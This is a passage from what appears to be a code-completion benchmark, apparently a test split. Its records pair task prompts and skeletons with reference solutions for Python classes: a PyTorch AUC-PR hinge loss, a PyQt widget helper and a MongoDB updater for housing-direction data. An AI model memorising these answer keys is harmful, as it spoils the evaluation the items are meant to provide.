When reduce is False, returns a loss per input/target element instead\"\"\"\n <|body_1|>\n\n def _prepare_labels_weights(logits, targets, weights=None):\n \"\"\"Args: logits: Variable :math:`(N, C)` where `C = number of classes` targets: Variable :math:`(N)` where each value is `0 <= targets[i] <= C-1` weights: Coefficients for the loss. Must be a `Tensor` of shape [N] or [N, C], where `N = batch_size`, `C = number of classes`. Returns: labels: Tensor of shape [N, C], one-hot representation weights: Tensor of shape broadcastable to labels\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__()\n precision_range_lower = 0.0\n precision_range_upper = 1.0\n self.num_classes = num_classes\n self.num_anchors = num_anchors\n self.precision_range = (precision_range_lower, precision_range_upper)\n precision_values, self.delta = range_to_anchors_and_delta(self.precision_range, self.num_anchors)\n self.register_buffer('precision_values', precision_values)\n self.biases = nn.Parameter(torch.zeros(self.num_classes, self.num_anchors, dtype=torch.float))\n self.lambdas = nn.Parameter(torch.ones(self.num_classes, self.num_anchors, dtype=torch.float))\n<|end_body_0|>\n\n<|body_start_1|>\n targets = targets['target']\n C = 1 if logits.dim() == 1 else logits.size(1)\n if self.num_classes != C:\n raise ValueError('num classes is %d while logits width is %d' % (self.num_classes, C))\n labels, weights = AUCPRHingeLoss._prepare_labels_weights(logits, targets, weights=weights)\n lambdas = lagrange_multiplier(self.lambdas)\n hinge_loss = weighted_hinge_loss(labels.unsqueeze(-1), logits.unsqueeze(-1) - self.biases, positive_weights=1.0 + lambdas * (1.0 - self.precision_values), negative_weights=lambdas * self.precision_values)\n class_priors = build_class_priors(labels, weights=weights)\n lambda_term = class_priors.unsqueeze(-1) * (lambdas * (1.0 - self.precision_values))\n per_anchor_loss = weights.unsqueeze(-1) * hinge_loss - lambda_term\n loss = per_anchor_loss.sum(2) * self.delta\n loss = loss / (self.precision_range[1] - self.precision_range[0])\n if not reduce:\n return loss\n elif size_average:\n return loss.mean()\n else:\n return loss.sum()\n<|end_body_1|>\n\n<|body_start_2|>\n N, C = logits.size()\n labels = torch.zeros((N, C), dtype=torch.float, device=logits.device).scatter(1, targets.unsqueeze(1), 1)\n if weights is None:\n weights = torch.ones(N, dtype=torch.float, device=logits.device)\n if weights.dim() == 1:\n weights.unsqueeze_(-1)\n return (labels, weights)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000014", "length_bytes": 16953, "license_type": "no_license", "methods": [{"docstring": "Args: config: Config containing `precision_range_lower`, `precision_range_upper`, `num_classes`, `num_anchors`", "name": "__init__", "signature": "def __init__(self, num_classes=1, num_anchors=20)"}, {"docstring": "Args: logits: Variable :math:`(N, C)` where `C = number of classes` targets: Variable :math:`(N)` where each value is `0 <= targets[i] <= C-1` weights: Coefficients for the loss. Must be a `Tensor` of shape [N] or [N, C], where `N = batch_size`, `C = number of classes`. size_average (bool, optional): By default, the losses are averaged over observations for each minibatch. However, if the field sizeAverage is set to False, the losses are instead summed for each minibatch. Default: ``True`` reduce (bool, optional): By default, the losses are averaged or summed over observations for each minibatch depending on size_average. 
When reduce is False, returns a loss per input/target element instead", "name": "forward", "signature": "def forward(self, logits, targets, reduce=True, size_average=True, weights=None)"}, {"docstring": "Args: logits: Variable :math:`(N, C)` where `C = number of classes` targets: Variable :math:`(N)` where each value is `0 <= targets[i] <= C-1` weights: Coefficients for the loss. Must be a `Tensor` of shape [N] or [N, C], where `N = batch_size`, `C = number of classes`. Returns: labels: Tensor of shape [N, C], one-hot representation weights: Tensor of shape broadcastable to labels", "name": "_prepare_labels_weights", "signature": "def _prepare_labels_weights(logits, targets, weights=None)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_003453", "prompt": "Implement the Python class `AUCPRHingeLoss` described below.\n\nClass description:\narea under the precision-recall curve loss, Reference: \"Scalable Learning of Non-Decomposable Objectives\", Section 5 TensorFlow Implementation: https://github.com/tensorflow/models/tree/master/research/global_objectives\n\nMethod signatures and docstrings:\n- def __init__(self, num_classes=1, num_anchors=20): Args: config: Config containing `precision_range_lower`, `precision_range_upper`, `num_classes`, `num_anchors`\n- def forward(self, logits, targets, reduce=True, size_average=True, weights=None): Args: logits: Variable :math:`(N, C)` where `C = number of classes` targets: Variable :math:`(N)` where each value is `0 <= targets[i] <= C-1` weights: Coefficients for the loss. Must be a `Tensor` of shape [N] or [N, C], where `N = batch_size`, `C = number of classes`. size_average (bool, optional): By default, the losses are averaged over observations for each minibatch. However, if the field sizeAverage is set to False, the losses are instead summed for each minibatch. Default: ``True`` reduce (bool, optional): By default, the losses are averaged or summed over observations for each minibatch depending on size_average. When reduce is False, returns a loss per input/target element instead\n- def _prepare_labels_weights(logits, targets, weights=None): Args: logits: Variable :math:`(N, C)` where `C = number of classes` targets: Variable :math:`(N)` where each value is `0 <= targets[i] <= C-1` weights: Coefficients for the loss. Must be a `Tensor` of shape [N] or [N, C], where `N = batch_size`, `C = number of classes`. Returns: labels: Tensor of shape [N, C], one-hot representation weights: Tensor of shape broadcastable to labels", "prompted_full_text": "Implement the Python class `AUCPRHingeLoss` described below.\n\nClass description:\narea under the precision-recall curve loss, Reference: \"Scalable Learning of Non-Decomposable Objectives\", Section 5 TensorFlow Implementation: https://github.com/tensorflow/models/tree/master/research/global_objectives\n\nMethod signatures and docstrings:\n- def __init__(self, num_classes=1, num_anchors=20): Args: config: Config containing `precision_range_lower`, `precision_range_upper`, `num_classes`, `num_anchors`\n- def forward(self, logits, targets, reduce=True, size_average=True, weights=None): Args: logits: Variable :math:`(N, C)` where `C = number of classes` targets: Variable :math:`(N)` where each value is `0 <= targets[i] <= C-1` weights: Coefficients for the loss. Must be a `Tensor` of shape [N] or [N, C], where `N = batch_size`, `C = number of classes`. size_average (bool, optional): By default, the losses are averaged over observations for each minibatch. 
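[Editor's illustration] The full AUCPRHingeLoss forward pass above depends on helpers (weighted_hinge_loss, lagrange_multiplier, build_class_priors) that are not part of this record, so a complete runnable demo is not possible here. The self-contained sketch below reproduces just the one-hot construction performed by _prepare_labels_weights; the tensor sizes are arbitrary.

    import torch

    logits = torch.randn(4, 3)                 # (N, C)
    targets = torch.tensor([0, 2, 1, 2])       # (N,) class indices
    # scatter writes a 1 into each row at the target's column -> one-hot labels
    labels = torch.zeros(logits.shape, dtype=torch.float).scatter(1, targets.unsqueeze(1), 1)
    # default weights: one per example, broadcastable against the (N, C) labels
    weights = torch.ones(logits.size(0), dtype=torch.float).unsqueeze(-1)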
However, if the field sizeAverage is set to False, the losses are instead summed for each minibatch. Default: ``True`` reduce (bool, optional): By default, the losses are averaged or summed over observations for each minibatch depending on size_average. When reduce is False, returns a loss per input/target element instead\n- def _prepare_labels_weights(logits, targets, weights=None): Args: logits: Variable :math:`(N, C)` where `C = number of classes` targets: Variable :math:`(N)` where each value is `0 <= targets[i] <= C-1` weights: Coefficients for the loss. Must be a `Tensor` of shape [N] or [N, C], where `N = batch_size`, `C = number of classes`. Returns: labels: Tensor of shape [N, C], one-hot representation weights: Tensor of shape broadcastable to labels\n\n<|skeleton|>\nclass AUCPRHingeLoss:\n \"\"\"area under the precision-recall curve loss, Reference: \"Scalable Learning of Non-Decomposable Objectives\", Section 5 TensorFlow Implementation: https://github.com/tensorflow/models/tree/master/research/global_objectives\"\"\"\n\n def __init__(self, num_classes=1, num_anchors=20):\n \"\"\"Args: config: Config containing `precision_range_lower`, `precision_range_upper`, `num_classes`, `num_anchors`\"\"\"\n <|body_0|>\n\n def forward(self, logits, targets, reduce=True, size_average=True, weights=None):\n \"\"\"Args: logits: Variable :math:`(N, C)` where `C = number of classes` targets: Variable :math:`(N)` where each value is `0 <= targets[i] <= C-1` weights: Coefficients for the loss. Must be a `Tensor` of shape [N] or [N, C], where `N = batch_size`, `C = number of classes`. size_average (bool, optional): By default, the losses are averaged over observations for each minibatch. However, if the field sizeAverage is set to False, the losses are instead summed for each minibatch. Default: ``True`` reduce (bool, optional): By default, the losses are averaged or summed over observations for each minibatch depending on size_average. When reduce is False, returns a loss per input/target element instead\"\"\"\n <|body_1|>\n\n def _prepare_labels_weights(logits, targets, weights=None):\n \"\"\"Args: logits: Variable :math:`(N, C)` where `C = number of classes` targets: Variable :math:`(N)` where each value is `0 <= targets[i] <= C-1` weights: Coefficients for the loss. Must be a `Tensor` of shape [N] or [N, C], where `N = batch_size`, `C = number of classes`. 
Returns: labels: Tensor of shape [N, C], one-hot representation weights: Tensor of shape broadcastable to labels\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__()\n precision_range_lower = 0.0\n precision_range_upper = 1.0\n self.num_classes = num_classes\n self.num_anchors = num_anchors\n self.precision_range = (precision_range_lower, precision_range_upper)\n precision_values, self.delta = range_to_anchors_and_delta(self.precision_range, self.num_anchors)\n self.register_buffer('precision_values', precision_values)\n self.biases = nn.Parameter(torch.zeros(self.num_classes, self.num_anchors, dtype=torch.float))\n self.lambdas = nn.Parameter(torch.ones(self.num_classes, self.num_anchors, dtype=torch.float))\n<|end_body_0|>\n\n<|body_start_1|>\n targets = targets['target']\n C = 1 if logits.dim() == 1 else logits.size(1)\n if self.num_classes != C:\n raise ValueError('num classes is %d while logits width is %d' % (self.num_classes, C))\n labels, weights = AUCPRHingeLoss._prepare_labels_weights(logits, targets, weights=weights)\n lambdas = lagrange_multiplier(self.lambdas)\n hinge_loss = weighted_hinge_loss(labels.unsqueeze(-1), logits.unsqueeze(-1) - self.biases, positive_weights=1.0 + lambdas * (1.0 - self.precision_values), negative_weights=lambdas * self.precision_values)\n class_priors = build_class_priors(labels, weights=weights)\n lambda_term = class_priors.unsqueeze(-1) * (lambdas * (1.0 - self.precision_values))\n per_anchor_loss = weights.unsqueeze(-1) * hinge_loss - lambda_term\n loss = per_anchor_loss.sum(2) * self.delta\n loss = loss / (self.precision_range[1] - self.precision_range[0])\n if not reduce:\n return loss\n elif size_average:\n return loss.mean()\n else:\n return loss.sum()\n<|end_body_1|>\n\n<|body_start_2|>\n N, C = logits.size()\n labels = torch.zeros((N, C), dtype=torch.float, device=logits.device).scatter(1, targets.unsqueeze(1), 1)\n if weights is None:\n weights = torch.ones(N, dtype=torch.float, device=logits.device)\n if weights.dim() == 1:\n weights.unsqueeze_(-1)\n return (labels, weights)\n<|end_body_2|>\n", "revision_id": "ed667918b78184c658361b3bccf2d23cca1c76f3", "skeleton": "<|skeleton|>\nclass AUCPRHingeLoss:\n \"\"\"area under the precision-recall curve loss, Reference: \"Scalable Learning of Non-Decomposable Objectives\", Section 5 TensorFlow Implementation: https://github.com/tensorflow/models/tree/master/research/global_objectives\"\"\"\n\n def __init__(self, num_classes=1, num_anchors=20):\n \"\"\"Args: config: Config containing `precision_range_lower`, `precision_range_upper`, `num_classes`, `num_anchors`\"\"\"\n <|body_0|>\n\n def forward(self, logits, targets, reduce=True, size_average=True, weights=None):\n \"\"\"Args: logits: Variable :math:`(N, C)` where `C = number of classes` targets: Variable :math:`(N)` where each value is `0 <= targets[i] <= C-1` weights: Coefficients for the loss. Must be a `Tensor` of shape [N] or [N, C], where `N = batch_size`, `C = number of classes`. size_average (bool, optional): By default, the losses are averaged over observations for each minibatch. However, if the field sizeAverage is set to False, the losses are instead summed for each minibatch. Default: ``True`` reduce (bool, optional): By default, the losses are averaged or summed over observations for each minibatch depending on size_average. 
When reduce is False, returns a loss per input/target element instead\"\"\"\n <|body_1|>\n\n def _prepare_labels_weights(logits, targets, weights=None):\n \"\"\"Args: logits: Variable :math:`(N, C)` where `C = number of classes` targets: Variable :math:`(N)` where each value is `0 <= targets[i] <= C-1` weights: Coefficients for the loss. Must be a `Tensor` of shape [N] or [N, C], where `N = batch_size`, `C = number of classes`. Returns: labels: Tensor of shape [N, C], one-hot representation weights: Tensor of shape broadcastable to labels\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class AUCPRHingeLoss:\n \"\"\"area under the precision-recall curve loss, Reference: \"Scalable Learning of Non-Decomposable Objectives\", Section 5 TensorFlow Implementation: https://github.com/tensorflow/models/tree/master/research/global_objectives\"\"\"\n\n def __init__(self, num_classes=1, num_anchors=20):\n \"\"\"Args: config: Config containing `precision_range_lower`, `precision_range_upper`, `num_classes`, `num_anchors`\"\"\"\n super().__init__()\n precision_range_lower = 0.0\n precision_range_upper = 1.0\n self.num_classes = num_classes\n self.num_anchors = num_anchors\n self.precision_range = (precision_range_lower, precision_range_upper)\n precision_values, self.delta = range_to_anchors_and_delta(self.precision_range, self.num_anchors)\n self.register_buffer('precision_values', precision_values)\n self.biases = nn.Parameter(torch.zeros(self.num_classes, self.num_anchors, dtype=torch.float))\n self.lambdas = nn.Parameter(torch.ones(self.num_classes, self.num_anchors, dtype=torch.float))\n\n def forward(self, logits, targets, reduce=True, size_average=True, weights=None):\n \"\"\"Args: logits: Variable :math:`(N, C)` where `C = number of classes` targets: Variable :math:`(N)` where each value is `0 <= targets[i] <= C-1` weights: Coefficients for the loss. Must be a `Tensor` of shape [N] or [N, C], where `N = batch_size`, `C = number of classes`. size_average (bool, optional): By default, the losses are averaged over observations for each minibatch. However, if the field sizeAverage is set to False, the losses are instead summed for each minibatch. Default: ``True`` reduce (bool, optional): By default, the losses are averaged or summed over observations for each minibatch depending on size_average. 
When reduce is False, returns a loss per input/target element instead\"\"\"\n targets = targets['target']\n C = 1 if logits.dim() == 1 else logits.size(1)\n if self.num_classes != C:\n raise ValueError('num classes is %d while logits width is %d' % (self.num_classes, C))\n labels, weights = AUCPRHingeLoss._prepare_labels_weights(logits, targets, weights=weights)\n lambdas = lagrange_multiplier(self.lambdas)\n hinge_loss = weighted_hinge_loss(labels.unsqueeze(-1), logits.unsqueeze(-1) - self.biases, positive_weights=1.0 + lambdas * (1.0 - self.precision_values), negative_weights=lambdas * self.precision_values)\n class_priors = build_class_priors(labels, weights=weights)\n lambda_term = class_priors.unsqueeze(-1) * (lambdas * (1.0 - self.precision_values))\n per_anchor_loss = weights.unsqueeze(-1) * hinge_loss - lambda_term\n loss = per_anchor_loss.sum(2) * self.delta\n loss = loss / (self.precision_range[1] - self.precision_range[0])\n if not reduce:\n return loss\n elif size_average:\n return loss.mean()\n else:\n return loss.sum()\n\n def _prepare_labels_weights(logits, targets, weights=None):\n \"\"\"Args: logits: Variable :math:`(N, C)` where `C = number of classes` targets: Variable :math:`(N)` where each value is `0 <= targets[i] <= C-1` weights: Coefficients for the loss. Must be a `Tensor` of shape [N] or [N, C], where `N = batch_size`, `C = number of classes`. Returns: labels: Tensor of shape [N, C], one-hot representation weights: Tensor of shape broadcastable to labels\"\"\"\n N, C = logits.size()\n labels = torch.zeros((N, C), dtype=torch.float, device=logits.device).scatter(1, targets.unsqueeze(1), 1)\n if weights is None:\n weights = torch.ones(N, dtype=torch.float, device=logits.device)\n if weights.dim() == 1:\n weights.unsqueeze_(-1)\n return (labels, weights)\n", "source": "the_stack_v2_python_sparse", "source_path": "src/model/loss.py", "source_repo": "lming24/kaggle-melanoma", "split": "test", "star_events_count": 0} {"blob_id": "dd340b5d993d6db71c3367fb32ecc19a7ed223aa", "bodies": ["widgets = []\ntextEdit = QLineEdit()\ntextEdit.setText(std_prm['name'])\nwidgets.append(textEdit)\ninputWidget = std_prm['build method'](std_prm['build method prms'], std_prm['slot'])\nwidgets.append(inputWidget)\nstd_prm['name widget'] = textEdit\nstd_prm['widget'] = inputWidget\nreturn widgets", "if isinstance(parameter['widget'], QPushButton):\n parameter['widget'].setText(parameter['value'])\nelif isinstance(parameter['widget'], QComboBox):\n parameter['widget'].currentTextChanged.disconnect()\n parameter['widget'].setCurrentText(parameter['value'])\n parameter['widget'].currentTextChanged.connect(parameter['slot'])"], "bodies_text": "<|body_start_0|>\n widgets = []\n textEdit = QLineEdit()\n textEdit.setText(std_prm['name'])\n widgets.append(textEdit)\n inputWidget = std_prm['build method'](std_prm['build method prms'], std_prm['slot'])\n widgets.append(inputWidget)\n std_prm['name widget'] = textEdit\n std_prm['widget'] = inputWidget\n return widgets\n<|end_body_0|>\n\n<|body_start_1|>\n if isinstance(parameter['widget'], QPushButton):\n parameter['widget'].setText(parameter['value'])\n elif isinstance(parameter['widget'], QComboBox):\n parameter['widget'].currentTextChanged.disconnect()\n parameter['widget'].setCurrentText(parameter['value'])\n parameter['widget'].currentTextChanged.connect(parameter['slot'])\n<|end_body_1|>\n", "class_docstring": "This class is used for the methods needed for presenting the StdPrm", "class_name": "StdPrmInput", "detected_licenses": [], 
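A note on the AUCPRHingeLoss record above: its forward pass leans on helpers (range_to_anchors_and_delta, lagrange_multiplier, weighted_hinge_loss, build_class_priors) that the record never defines, so the extracted class is not runnable on its own. The label/weight preparation step is self-contained, though. The sketch below reproduces just that step; the shapes and sample values are illustrative, and only PyTorch is assumed.

import torch

# Illustrative inputs: N = 4 examples, C = 3 classes.
logits = torch.randn(4, 3)
targets = torch.tensor([0, 2, 1, 2])

N, C = logits.size()
# One-hot labels of shape [N, C], built the same way as _prepare_labels_weights:
labels = torch.zeros((N, C), dtype=torch.float).scatter(1, targets.unsqueeze(1), 1)
# Default weights: ones of shape [N], unsqueezed to [N, 1] so they broadcast
# against the [N, C] labels (and later against the per-anchor hinge loss).
weights = torch.ones(N, dtype=torch.float)
if weights.dim() == 1:
    weights = weights.unsqueeze(-1)

print(labels)         # each row is one-hot, e.g. [1., 0., 0.] for target 0
print(weights.shape)  # torch.Size([4, 1])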
"format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass StdPrmInput:\n \"\"\"This class is used for the methods needed for presenting the StdPrm\"\"\"\n\n def widgets(std_prm: Parameter) -> List[QWidget]:\n \"\"\"- This method generates all needed for input to the std_prm - A QLineEdit for the std_prm name - An input widget for the std_prm (by activating the \"build_method\" attribute of the parameters) Args: std_prm : (Parameter) - The parameter to be presented\"\"\"\n <|body_0|>\n\n def updateWidget(parameter: Parameter):\n \"\"\"Update the widget of the parameter with the value. The following is the process of the update: - The widget is changed - The widget change activates a slot - The slot changes the Parameter value - This method is used to change the widget\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n widgets = []\n textEdit = QLineEdit()\n textEdit.setText(std_prm['name'])\n widgets.append(textEdit)\n inputWidget = std_prm['build method'](std_prm['build method prms'], std_prm['slot'])\n widgets.append(inputWidget)\n std_prm['name widget'] = textEdit\n std_prm['widget'] = inputWidget\n return widgets\n<|end_body_0|>\n\n<|body_start_1|>\n if isinstance(parameter['widget'], QPushButton):\n parameter['widget'].setText(parameter['value'])\n elif isinstance(parameter['widget'], QComboBox):\n parameter['widget'].currentTextChanged.disconnect()\n parameter['widget'].setCurrentText(parameter['value'])\n parameter['widget'].currentTextChanged.connect(parameter['slot'])\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000015", "length_bytes": 13518, "license_type": "no_license", "methods": [{"docstring": "- This method generates all needed for input to the std_prm - A QLineEdit for the std_prm name - An input widget for the std_prm (by activating the \"build_method\" attribute of the parameters) Args: std_prm : (Parameter) - The parameter to be presented", "name": "widgets", "signature": "def widgets(std_prm: Parameter) -> List[QWidget]"}, {"docstring": "Update the widget of the parameter with the value. The following is the process of the update: - The widget is changed - The widget change activates a slot - The slot changes the Parameter value - This method is used to change the widget", "name": "updateWidget", "signature": "def updateWidget(parameter: Parameter)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_004336", "prompt": "Implement the Python class `StdPrmInput` described below.\n\nClass description:\nThis class is used for the methods needed for presenting the StdPrm\n\nMethod signatures and docstrings:\n- def widgets(std_prm: Parameter) -> List[QWidget]: - This method generates all needed for input to the std_prm - A QLineEdit for the std_prm name - An input widget for the std_prm (by activating the \"build_method\" attribute of the parameters) Args: std_prm : (Parameter) - The parameter to be presented\n- def updateWidget(parameter: Parameter): Update the widget of the parameter with the value. 
The following is the process of the update: - The widget is changed - The widget change activates a slot - The slot changes the Parameter value - This method is used to change the widget", "prompted_full_text": "Implement the Python class `StdPrmInput` described below.\n\nClass description:\nThis class is used for the methods needed for presenting the StdPrm\n\nMethod signatures and docstrings:\n- def widgets(std_prm: Parameter) -> List[QWidget]: - This method generates all needed for input to the std_prm - A QLineEdit for the std_prm name - An input widget for the std_prm (by activating the \"build_method\" attribute of the parameters) Args: std_prm : (Parameter) - The parameter to be presented\n- def updateWidget(parameter: Parameter): Update the widget of the parameter with the value. The following is the process of the update: - The widget is changed - The widget change activates a slot - The slot changes the Parameter value - This method is used to change the widget\n\n<|skeleton|>\nclass StdPrmInput:\n \"\"\"This class is used for the methods needed for presenting the StdPrm\"\"\"\n\n def widgets(std_prm: Parameter) -> List[QWidget]:\n \"\"\"- This method generates all needed for input to the std_prm - A QLineEdit for the std_prm name - An input widget for the std_prm (by activating the \"build_method\" attribute of the parameters) Args: std_prm : (Parameter) - The parameter to be presented\"\"\"\n <|body_0|>\n\n def updateWidget(parameter: Parameter):\n \"\"\"Update the widget of the parameter with the value. The following is the process of the update: - The widget is changed - The widget change activates a slot - The slot changes the Parameter value - This method is used to change the widget\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n widgets = []\n textEdit = QLineEdit()\n textEdit.setText(std_prm['name'])\n widgets.append(textEdit)\n inputWidget = std_prm['build method'](std_prm['build method prms'], std_prm['slot'])\n widgets.append(inputWidget)\n std_prm['name widget'] = textEdit\n std_prm['widget'] = inputWidget\n return widgets\n<|end_body_0|>\n\n<|body_start_1|>\n if isinstance(parameter['widget'], QPushButton):\n parameter['widget'].setText(parameter['value'])\n elif isinstance(parameter['widget'], QComboBox):\n parameter['widget'].currentTextChanged.disconnect()\n parameter['widget'].setCurrentText(parameter['value'])\n parameter['widget'].currentTextChanged.connect(parameter['slot'])\n<|end_body_1|>\n", "revision_id": "dfc30621bf330c300bca75103e7f8bca8b7a8d58", "skeleton": "<|skeleton|>\nclass StdPrmInput:\n \"\"\"This class is used for the methods needed for presenting the StdPrm\"\"\"\n\n def widgets(std_prm: Parameter) -> List[QWidget]:\n \"\"\"- This method generates all needed for input to the std_prm - A QLineEdit for the std_prm name - An input widget for the std_prm (by activating the \"build_method\" attribute of the parameters) Args: std_prm : (Parameter) - The parameter to be presented\"\"\"\n <|body_0|>\n\n def updateWidget(parameter: Parameter):\n \"\"\"Update the widget of the parameter with the value. 
The following is the process of the update: - The widget is changed - The widget change activates a slot - The slot changes the Parameter value - This method is used to change the widget\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class StdPrmInput:\n \"\"\"This class is used for the methods needed for presenting the StdPrm\"\"\"\n\n def widgets(std_prm: Parameter) -> List[QWidget]:\n \"\"\"- This method generates all needed for input to the std_prm - A QLineEdit for the std_prm name - An input widget for the std_prm (by activating the \"build_method\" attribute of the parameters) Args: std_prm : (Parameter) - The parameter to be presented\"\"\"\n widgets = []\n textEdit = QLineEdit()\n textEdit.setText(std_prm['name'])\n widgets.append(textEdit)\n inputWidget = std_prm['build method'](std_prm['build method prms'], std_prm['slot'])\n widgets.append(inputWidget)\n std_prm['name widget'] = textEdit\n std_prm['widget'] = inputWidget\n return widgets\n\n def updateWidget(parameter: Parameter):\n \"\"\"Update the widget of the parameter with the value. The following is the process of the update: - The widget is changed - The widget change activates a slot - The slot changes the Parameter value - This method is used to change the widget\"\"\"\n if isinstance(parameter['widget'], QPushButton):\n parameter['widget'].setText(parameter['value'])\n elif isinstance(parameter['widget'], QComboBox):\n parameter['widget'].currentTextChanged.disconnect()\n parameter['widget'].setCurrentText(parameter['value'])\n parameter['widget'].currentTextChanged.connect(parameter['slot'])\n", "source": "the_stack_v2_python_sparse", "source_path": "AI Project/Project/UserInterface/Parameter.py", "source_repo": "IlanHindy/AI-Learn", "split": "test", "star_events_count": 0} {"blob_id": "e3b44eeec58d1ff8bca1901a4eb06dfc27450357", "bodies": ["word_list = []\nfor k in ['东', '南', '西', '北']:\n if k in str(direction):\n word_list.append(k)\nif len(word_list) > 0 and ''.join(word_list) in cls._true_words:\n return ''.join(word_list)", "query = {'city': city, 'region': region, 'name': name, 'house_num': house_num}\nif room_num:\n query = {'city': city, 'region': region, 'name': name, 'house_num': house_num, 'room_num': room_num}\ndirection = cls.format_direction(direction)\nif direction:\n house_list = list(update_col.find(query))\n if len(house_list) > 0:\n print(query, '***更新')\n for house in house_list:\n if 'direction' not in house or house['direction'] not in cls._true_words:\n columns_source = []\n try:\n columns_source = house['columns_source']\n except:\n pass\n if house.get('from', None) != direction_source:\n if len(columns_source) > 0:\n for column in columns_source:\n if 'direction' in column:\n columns_source.remove(column)\n columns_source.append({'direction': '小资家', 'u_time': datetime.utcnow()})\n update_col.update_one({'_id': house['_id']}, {'$set': {'direction': direction, 'columns_source': columns_source, 'm_date': datetime.utcnow()}})"], "bodies_text": "<|body_start_0|>\n word_list = []\n for k in ['东', '南', '西', '北']:\n if k in str(direction):\n word_list.append(k)\n if len(word_list) > 0 and ''.join(word_list) in cls._true_words:\n return ''.join(word_list)\n<|end_body_0|>\n\n<|body_start_1|>\n query = {'city': city, 'region': region, 'name': name, 'house_num': house_num}\n if room_num:\n query = {'city': city, 'region': region, 'name': name, 'house_num': house_num, 'room_num': room_num}\n 
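The StdPrmInput.updateWidget body above uses a common Qt idiom: disconnect a signal before updating the widget programmatically, then reconnect, so the update does not re-trigger the slot. A minimal demonstration of that pattern, assuming PyQt5 and a usable (or offscreen) Qt platform:

import sys
from PyQt5.QtWidgets import QApplication, QComboBox

app = QApplication(sys.argv)

def slot(text):
    print('slot fired:', text)

combo = QComboBox()
combo.addItems(['alpha', 'beta', 'gamma'])
combo.currentTextChanged.connect(slot)

# The updateWidget pattern: detach the slot, change the value, reattach.
combo.currentTextChanged.disconnect()
combo.setCurrentText('beta')       # silent: no slot call here
combo.currentTextChanged.connect(slot)

combo.setCurrentText('gamma')      # prints "slot fired: gamma"

Note that disconnect() with no arguments drops every connection on the signal; QSignalBlocker (or blockSignals) quiets the widget without losing other slots, which matters when more than one is attached.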
direction = cls.format_direction(direction)\n if direction:\n house_list = list(update_col.find(query))\n if len(house_list) > 0:\n print(query, '***更新')\n for house in house_list:\n if 'direction' not in house or house['direction'] not in cls._true_words:\n columns_source = []\n try:\n columns_source = house['columns_source']\n except:\n pass\n if house.get('from', None) != direction_source:\n if len(columns_source) > 0:\n for column in columns_source:\n if 'direction' in column:\n columns_source.remove(column)\n columns_source.append({'direction': '小资家', 'u_time': datetime.utcnow()})\n update_col.update_one({'_id': house['_id']}, {'$set': {'direction': direction, 'columns_source': columns_source, 'm_date': datetime.utcnow()}})\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Direction", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Direction:\n\n def format_direction(cls, direction):\n \"\"\":param direction: 朝向 :return: 有效朝向\"\"\"\n <|body_0|>\n\n def update_direction(cls, city, region, name, house_num, direction, direction_source, room_num=None):\n \"\"\":param city: 城市 :param region: 区域 :param name: 小区名 :param house_num: 楼栋号 :param direction: 朝向 :param direction_source: 朝向来源 :param room_num: 房号\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n word_list = []\n for k in ['东', '南', '西', '北']:\n if k in str(direction):\n word_list.append(k)\n if len(word_list) > 0 and ''.join(word_list) in cls._true_words:\n return ''.join(word_list)\n<|end_body_0|>\n\n<|body_start_1|>\n query = {'city': city, 'region': region, 'name': name, 'house_num': house_num}\n if room_num:\n query = {'city': city, 'region': region, 'name': name, 'house_num': house_num, 'room_num': room_num}\n direction = cls.format_direction(direction)\n if direction:\n house_list = list(update_col.find(query))\n if len(house_list) > 0:\n print(query, '***更新')\n for house in house_list:\n if 'direction' not in house or house['direction'] not in cls._true_words:\n columns_source = []\n try:\n columns_source = house['columns_source']\n except:\n pass\n if house.get('from', None) != direction_source:\n if len(columns_source) > 0:\n for column in columns_source:\n if 'direction' in column:\n columns_source.remove(column)\n columns_source.append({'direction': '小资家', 'u_time': datetime.utcnow()})\n update_col.update_one({'_id': house['_id']}, {'$set': {'direction': direction, 'columns_source': columns_source, 'm_date': datetime.utcnow()}})\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000016", "length_bytes": 2714, "license_type": "no_license", "methods": [{"docstring": ":param direction: 朝向 :return: 有效朝向", "name": "format_direction", "signature": "def format_direction(cls, direction)"}, {"docstring": ":param city: 城市 :param region: 区域 :param name: 小区名 :param house_num: 楼栋号 :param direction: 朝向 :param direction_source: 朝向来源 :param room_num: 房号", "name": "update_direction", "signature": "def update_direction(cls, city, region, name, house_num, direction, direction_source, room_num=None)"}], "n_methods": 2, "prompt": "Implement the Python class `Direction` described below.\n\nClass description:\nImplement the Direction class.\n\nMethod signatures and docstrings:\n- def format_direction(cls, direction): :param direction: 朝向 :return: 有效朝向\n- def update_direction(cls, city, region, name, house_num, direction, direction_source, room_num=None): :param city: 城市 :param region: 区域 :param name: 小区名 :param house_num: 楼栋号 :param direction: 朝向 :param 
